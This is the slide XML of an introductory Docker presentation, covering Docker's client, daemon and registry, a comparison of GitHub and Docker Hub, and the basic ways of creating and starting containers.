                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Data Scientist</a:t>
            </a:r>
            <a:endParaRPr sz="3877">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1046" name="Google Shape;1046;p182"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="336775"/>
            <a:ext cx="9042725" cy="43286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83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1729875"/>
            <a:ext cx="8520600" cy="106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Docker Engine Architecture</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accen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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="163650"/>
            <a:ext cx="8520600" cy="99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500">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Virtual Operating System</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4500">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="204" name="Google Shape;204;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1971575" y="1039600"/>
            <a:ext cx="5521901" cy="38825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id="1056" name="Google Shape;1056;p184"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="823375" y="152400"/>
            <a:ext cx="7599276" cy="49911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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1061" name="Google Shape;1061;p185"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9" y="4"/>
            <a:ext cx="9144000" cy="5143500"/>
            <a:chOff x="-8525" y="-17075"/>
            <a:chExt cx="9144000" cy="5143500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1062" name="Google Shape;1062;p185"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-8525" y="-17075"/>
              <a:ext cx="9144000" cy="5143500"/>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3" name="Google Shape;1063;p185"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="5864" l="1797" r="0" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="399225" y="175013"/>
              <a:ext cx="8164326" cy="4793475"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1064" name="Google Shape;1064;p185"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7698468" y="117397"/>
              <a:ext cx="1285676" cy="366500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw rotWithShape="0" algn="bl" dist="19050">
                <a:srgbClr val="FFFFFF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
        </p:pic>
      </p:gr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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540300" y="1094575"/>
            <a:ext cx="8028600" cy="3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300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker Architecture Consist of 3 Components</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. Docker Client  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       ( Tool/Software that you install on your machine)</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. Docker Daemon </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       ( Service that run inside your machine as background service)</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. Docker Registry  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      (Website/Cloud App) (https://hub.docker.com)</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1070" name="Google Shape;1070;p186"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539625" y="335725"/>
            <a:ext cx="78006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100">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker Architecture</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87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="407725" y="75765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GitHub vs </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker Hub</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1076" name="Google Shape;1076;p187"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685825" y="1977438"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3925800"/>
                <a:gridCol w="3925800"/>
              </a:tblGrid>
              <a:tr h="457175">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>It is a website</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1800">
                        <a:solidFill>
                          <a:srgbClr val="38761D"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>It is also a website</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1800">
                        <a:solidFill>
                          <a:srgbClr val="38761D"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="457175">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>It store source code</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1800">
                        <a:solidFill>
                          <a:srgbClr val="38761D"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>It store OS images</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1800">
                        <a:solidFill>
                          <a:srgbClr val="38761D"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="731500">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Maximum 100mb per file is allowed</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1800">
                        <a:solidFill>
                          <a:srgbClr val="38761D"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>There is no size restriction</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1800">
                        <a:solidFill>
                          <a:srgbClr val="38761D"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>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88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="911325"/>
            <a:ext cx="8520600" cy="3329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In order to run our </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, We need to create a container from image</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="174275" y="303500"/>
            <a:ext cx="8520600" cy="131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920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There are 4 a</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pproach</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> by which container can be created/start</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1087" name="Google Shape;1087;p189"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="855825" y="1789525"/>
            <a:ext cx="7736700" cy="2204700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ocker </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pull =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> create =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> start  </a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dockerfile</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker Compose </a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1088" name="Google Shape;1088;p189"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="948025" y="4245000"/>
            <a:ext cx="4995000" cy="5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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I = Image, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C = Container</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>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p190"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1098" name="Google Shape;1098;p191"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9" y="4"/>
            <a:ext cx="9144000" cy="5143500"/>
            <a:chOff x="-8525" y="-17075"/>
            <a:chExt cx="9144000" cy="5143500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1099" name="Google Shape;1099;p191"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-8525" y="-17075"/>
              <a:ext cx="9144000" cy="5143500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2F2F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0" name="Google Shape;1100;p191"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="5864" l="1797" r="0" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="399225" y="175013"/>
              <a:ext cx="8164326" cy="4793475"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1101" name="Google Shape;1101;p191"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7698468" y="117397"/>
              <a:ext cx="1285676" cy="366500"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw rotWithShape="0" algn="bl" dist="19050">
                <a:srgbClr val="FFFFFF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
        </p:pic>
      </p:gr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pic>
        <p:nvPicPr>
          <p:cNvPr id="1106" name="Google Shape;1106;p192"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2815825" y="2025875"/>
            <a:ext cx="1511100" cy="1511078"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1107" name="Google Shape;1107;p192"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="6981" l="0" r="4104" t="9906"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6134199" y="1728475"/>
            <a:ext cx="1236874" cy="1088759"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1108" name="Google Shape;1108;p192"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4604538" y="2571750"/>
            <a:ext cx="1246800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1109" name="Google Shape;1109;p192"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4582142" y="2864500"/>
            <a:ext cx="1267200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1110" name="Google Shape;1110;p192"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6223145" y="560514"/>
            <a:ext cx="650483" cy="585937"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
